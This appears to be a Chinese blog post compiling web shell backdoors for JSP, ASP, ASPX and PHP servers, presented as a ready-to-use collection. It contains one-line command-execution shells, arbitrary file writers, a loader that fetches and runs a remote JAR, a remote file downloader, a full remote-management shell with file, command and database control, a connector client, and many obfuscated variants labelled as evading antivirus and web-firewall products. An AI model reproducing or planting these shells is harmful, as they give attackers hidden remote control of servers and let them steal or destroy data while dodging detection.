zoukankan      html  css  js  c++  java
  • 后门木马整理

    JSP:

    无回显(http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls)

    <%Runtime.getRuntime().exec(request.getParameter("i"));%>

    有回显 (http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls)

    1 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("
    2 <pre>");
    3         while((a=in.read(b))!=-1){
    4             out.println(new String(b,0,a));
    5         }
    6         out.print("</pre>
    7 ");
    8     }
    9 %>
    View Code

    客户端写入:

    http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234

    1 <%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
    View Code

    http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234

    1 <%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
    View Code

    http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234

    1 <%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
    View Code

    http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234 

    1 <%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
    View Code

    反射调用外部jar:

    http://192.168.16.240:8080/Shell/reflect.jsp?u=http://javaweb.org/Cat.jar&023=A 

    1 <%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
    View Code

    常规:

    1 <%
    2 if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
    3 %>
    View Code
      1 <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
      2 <%!String Pwd = "pass";
      3 
      4     String EC(String s, String c) throws Exception {
      5         return s;
      6     }//new String(s.getBytes("ISO-8859-1"),c);}
      7 
      8     Connection GC(String s) throws Exception {
      9         String[] x = s.trim().split("
    ");
     10         Class.forName(x[0].trim()).newInstance();
     11         Connection c = DriverManager.getConnection(x[1].trim());
     12         if (x.length > 2) {
     13             c.setCatalog(x[2].trim());
     14         }
     15         return c;
     16     }
     17 
     18     void AA(StringBuffer sb) throws Exception {
     19         File r[] = File.listRoots();
     20         for (int i = 0; i < r.length; i++) {
     21             sb.append(r[i].toString().substring(0, 2));
     22         }
     23     }
     24 
     25     void BB(String s, StringBuffer sb) throws Exception {
     26         File oF = new File(s), l[] = oF.listFiles();
     27         String sT, sQ, sF = "";
     28         java.util.Date dt;
     29         SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
     30         for (int i = 0; i < l.length; i++) {
     31             dt = new java.util.Date(l[i].lastModified());
     32             sT = fm.format(dt);
     33             sQ = l[i].canRead() ? "R" : "";
     34             sQ += l[i].canWrite() ? " W" : "";
     35             if (l[i].isDirectory()) {
     36                 sb.append(l[i].getName() + "/	" + sT + "	" + l[i].length()
     37                         + "	" + sQ + "
    ");
     38             } else {
     39                 sF += l[i].getName() + "	" + sT + "	" + l[i].length() + "	"
     40                         + sQ + "
    ";
     41             }
     42         }
     43         sb.append(sF);
     44     }
     45 
     46     void EE(String s) throws Exception {
     47         File f = new File(s);
     48         if (f.isDirectory()) {
     49             File x[] = f.listFiles();
     50             for (int k = 0; k < x.length; k++) {
     51                 if (!x[k].delete()) {
     52                     EE(x[k].getPath());
     53                 }
     54             }
     55         }
     56         f.delete();
     57     }
     58 
     59     void FF(String s, HttpServletResponse r) throws Exception {
     60         int n;
     61         byte[] b = new byte[512];
     62         r.reset();
     63         ServletOutputStream os = r.getOutputStream();
     64         BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
     65         os.write(("->" + "|").getBytes(), 0, 3);
     66         while ((n = is.read(b, 0, 512)) != -1) {
     67             os.write(b, 0, n);
     68         }
     69         os.write(("|" + "<-").getBytes(), 0, 3);
     70         os.close();
     71         is.close();
     72     }
     73 
     74     void GG(String s, String d) throws Exception {
     75         String h = "0123456789ABCDEF";
     76         int n;
     77         File f = new File(s);
     78         f.createNewFile();
     79         FileOutputStream os = new FileOutputStream(f);
     80         for (int i = 0; i < d.length(); i += 2) {
     81             os
     82                     .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
     83                             .charAt(i + 1))));
     84         }
     85         os.close();
     86     }
     87 
     88     void HH(String s, String d) throws Exception {
     89         File sf = new File(s), df = new File(d);
     90         if (sf.isDirectory()) {
     91             if (!df.exists()) {
     92                 df.mkdir();
     93             }
     94             File z[] = sf.listFiles();
     95             for (int j = 0; j < z.length; j++) {
     96                 HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
     97             }
     98         } else {
     99             FileInputStream is = new FileInputStream(sf);
    100             FileOutputStream os = new FileOutputStream(df);
    101             int n;
    102             byte[] b = new byte[512];
    103             while ((n = is.read(b, 0, 512)) != -1) {
    104                 os.write(b, 0, n);
    105             }
    106             is.close();
    107             os.close();
    108         }
    109     }
    110 
    111     void II(String s, String d) throws Exception {
    112         File sf = new File(s), df = new File(d);
    113         sf.renameTo(df);
    114     }
    115 
    116     void JJ(String s) throws Exception {
    117         File f = new File(s);
    118         f.mkdir();
    119     }
    120 
    121     void KK(String s, String t) throws Exception {
    122         File f = new File(s);
    123         SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
    124         java.util.Date dt = fm.parse(t);
    125         f.setLastModified(dt.getTime());
    126     }
    127 
    128     void LL(String s, String d) throws Exception {
    129         URL u = new URL(s);
    130         int n;
    131         FileOutputStream os = new FileOutputStream(d);
    132         HttpURLConnection h = (HttpURLConnection) u.openConnection();
    133         InputStream is = h.getInputStream();
    134         byte[] b = new byte[512];
    135         while ((n = is.read(b, 0, 512)) != -1) {
    136             os.write(b, 0, n);
    137         }
    138         os.close();
    139         is.close();
    140         h.disconnect();
    141     }
    142 
    143     void MM(InputStream is, StringBuffer sb) throws Exception {
    144         String l;
    145         BufferedReader br = new BufferedReader(new InputStreamReader(is));
    146         while ((l = br.readLine()) != null) {
    147             sb.append(l + "
    ");
    148         }
    149     }
    150 
    151     void NN(String s, StringBuffer sb) throws Exception {
    152         Connection c = GC(s);
    153         ResultSet r = c.getMetaData().getCatalogs();
    154         while (r.next()) {
    155             sb.append(r.getString(1) + "	");
    156         }
    157         r.close();
    158         c.close();
    159     }
    160 
    161     void OO(String s, StringBuffer sb) throws Exception {
    162         Connection c = GC(s);
    163         String[] t = { "TABLE" };
    164         ResultSet r = c.getMetaData().getTables(null, null, "%", t);
    165         while (r.next()) {
    166             sb.append(r.getString("TABLE_NAME") + "	");
    167         }
    168         r.close();
    169         c.close();
    170     }
    171 
    172     void PP(String s, StringBuffer sb) throws Exception {
    173         String[] x = s.trim().split("
    ");
    174         Connection c = GC(s);
    175         Statement m = c.createStatement(1005, 1007);
    176         ResultSet r = m.executeQuery("select * from " + x[3]);
    177         ResultSetMetaData d = r.getMetaData();
    178         for (int i = 1; i <= d.getColumnCount(); i++) {
    179             sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
    180                     + ")	");
    181         }
    182         r.close();
    183         m.close();
    184         c.close();
    185     }
    186 
    187     void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
    188         int i;
    189         Connection c = GC(s);
    190         Statement m = c.createStatement(1005, 1008);
    191         try {
    192             ResultSet r = m.executeQuery(q);
    193             ResultSetMetaData d = r.getMetaData();
    194             int n = d.getColumnCount();
    195             for (i = 1; i <= n; i++) {
    196                 sb.append(d.getColumnName(i) + "	|	");
    197             }
    198             sb.append("
    ");
    199             while (r.next()) {
    200                 for (i = 1; i <= n; i++) {
    201                     sb.append(EC(r.getString(i), cs) + "	|	");
    202                 }
    203                 sb.append("
    ");
    204             }
    205             r.close();
    206         } catch (Exception e) {
    207             sb.append("Result	|	
    ");
    208             try {
    209                 m.executeUpdate(q);
    210                 sb.append("Execute Successfully!	|	
    ");
    211             } catch (Exception ee) {
    212                 sb.append(ee.toString() + "	|	
    ");
    213             }
    214         }
    215         m.close();
    216         c.close();
    217     }%>
    218      
    219      
    220 <%
    221     String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
    222     request.setCharacterEncoding(cs);
    223     response.setContentType("text/html;charset=" + cs);
    224     String Z = EC(request.getParameter(Pwd) + "", cs);
    225     String z1 = EC(request.getParameter("z1") + "", cs);
    226     String z2 = EC(request.getParameter("z2") + "", cs);
    227     StringBuffer sb = new StringBuffer("");
    228     try {
    229         sb.append("->" + "|");
    230         if (Z.equals("A")) {
    231             String s = new File(application.getRealPath(request
    232                     .getRequestURI())).getParent();
    233             sb.append(s + "	");
    234             if (!s.substring(0, 1).equals("/")) {
    235                 AA(sb);
    236             }
    237         } else if (Z.equals("B")) {
    238             BB(z1, sb);
    239         } else if (Z.equals("C")) {
    240             String l = "";
    241             BufferedReader br = new BufferedReader(
    242                     new InputStreamReader(new FileInputStream(new File(
    243                             z1))));
    244             while ((l = br.readLine()) != null) {
    245                 sb.append(l + "
    ");
    246             }
    247             br.close();
    248         } else if (Z.equals("D")) {
    249             BufferedWriter bw = new BufferedWriter(
    250                     new OutputStreamWriter(new FileOutputStream(
    251                             new File(z1))));
    252             bw.write(z2);
    253             bw.close();
    254             sb.append("1");
    255         } else if (Z.equals("E")) {
    256             EE(z1);
    257             sb.append("1");
    258         } else if (Z.equals("F")) {
    259             FF(z1, response);
    260         } else if (Z.equals("G")) {
    261             GG(z1, z2);
    262             sb.append("1");
    263         } else if (Z.equals("H")) {
    264             HH(z1, z2);
    265             sb.append("1");
    266         } else if (Z.equals("I")) {
    267             II(z1, z2);
    268             sb.append("1");
    269         } else if (Z.equals("J")) {
    270             JJ(z1);
    271             sb.append("1");
    272         } else if (Z.equals("K")) {
    273             KK(z1, z2);
    274             sb.append("1");
    275         } else if (Z.equals("L")) {
    276             LL(z1, z2);
    277             sb.append("1");
    278         } else if (Z.equals("M")) {
    279             String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
    280             Process p = Runtime.getRuntime().exec(c);
    281             MM(p.getInputStream(), sb);
    282             MM(p.getErrorStream(), sb);
    283         } else if (Z.equals("N")) {
    284             NN(z1, sb);
    285         } else if (Z.equals("O")) {
    286             OO(z1, sb);
    287         } else if (Z.equals("P")) {
    288             PP(z1, sb);
    289         } else if (Z.equals("Q")) {
    290             QQ(cs, z1, z2, sb);
    291         }
    292     } catch (Exception e) {
    293         sb.append("ERROR" + ":// " + e.toString());
    294     }
    295     sb.append("|" + "<-");
    296     out.print(sb.toString());
    297 %>
    View Code

     JSP后门连接:

    1 <html><head><title>JSP一句话木马客户端</title></head><div align=center>  <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text>  <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form>  <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>   </textarea>  </div></body>
    View Code

     下载远程文件:

    http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png

    1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
    View Code

    下载web路径:

    http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png

    1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
    View Code

    ASP:

    <%eval request("chopper")%>

    常规:

     1 <%execute request("chopper")%>
     2 
     3 <%execute(request("chopper"))%>
     4 
     5 <%ExecuteGlobal request("chopper")%>
     6 
     7 <%Eval(Request(chr(35)))%>
     8 
     9 <%dy=request("c")%><%Eval(dy)%> 
    10 
    11 <%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> 
    12 
    13 <% if Request("c")<>"" then ExecuteGlobal request("c") end if %>
    14 
    15 <%execute request("c")%><%'<% loop <%:%>
    16 
    17 < %'<% loop <%:%><%execute request("a")%>
    18 
    19 <script language=vbs runat=server>eval(request("c"))</script> 
    20 
    21 <script language=VBScript runat=server>execute request("#")</script> 
    22 
    23 <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>
    24 
    25 <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
    26 
    27 <%execute(unescape("eval%20request%28%22aaa%22%29"))%>
    View Code
    UTF-7编码加密:
    1 <%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
    View Code
     
    Script Encoder 加密  //密码c
    1 <%@ LANGUAGE = VBScript.Encode %>
    2 <%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>
    View Code

    过雷客图:

     1 <%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
     2 ms.Language="VBScript"
     3 ms.AddObject "Response", Response
     4 ms.AddObject "request", request
     5 ms.AddObject "session", session
     6 ms.AddObject "server", server
     7 ms.AddObject "application", application
     8 ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
     9 
    10 <%
    11 password=Request("class")
    12 Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
    13 %>
    14 
    15 
    16 <%
    17 password=Request("class")
    18 Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
    19 %>
    View Code

    ASPX:

    常规免杀

    1 <%@ Page Language="Jscript"%>
    2 <%
    3 var a = Request.Item["M"];
    4 var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//主要就是这个地方 其他地方好像不会管
    5 eval(a,b);
    6 Response.Write("Test");
    7 %>
    View Code

    绕过安全狗

     1 <%
     2 dim play
     3 '
     4 '
     5 ''''''''''''''''''
     6 '''''''''
     7 play = request("#")
     8 %>
     9 Error
    10 <%
    11 execute(play)
    12 %>
    View Code
    1 <%@codepage=65000%>
    2 <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>
    View Code

    过D盾:

     1 <%@ Page Language="Jscript" Debug=true%>
     2 <%
     3 var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0="));
     4 var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));
     5 var c=eval(a,b);
     6 eval(c,b);
     7 
     8 %>
     9 
    10  
    11 
    12 <%@ Page Language="Jscript" Debug=true%>
    13 <%
    14 var a=Request.Form["pass"];
    15 var b="unsa",c="fe",d=b+c;
    16 function fun()
    17 {
    18 return a;
    19 }
    20 eval(fun(),d);
    21 %>
    View Code

    PHP:

    常规:

    1 <?php
    2 system($_GET['cmd']);
    3 ?>
    View Code

    过D盾:

    1 <?php
    2 $ab = $_REQUEST['d'];
    3 $a['t'] = "";
    4 eval($a['t'].$ab);
    View Code

    过安全狗

    1 <?php
    2 $a = $_REQUEST['d'];
    3 $a = "$a";
    4 $b['test'] = "";
    5 eval($b['test']."$a");
    View Code
  • 相关阅读:
    UEFI启动 安装win8 win10 及windows server 2012 最简单的方法
    Android SDK中国在线更新镜像服务器 解决GOOGLE更新无法下载 更新失败的问题
    DELPHI 单元文件结构
    获取程序自身大小的2个函数
    实时获取网络时间 并转换为北京时间的函数
    部署maven的一些要点、遇到的问题
    cron表达式详解
    redhat安装xwindow环境
    tomcat执行文件权限
    一个方便的java分页算法
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/11176412.html
Copyright © 2011-2022 走看看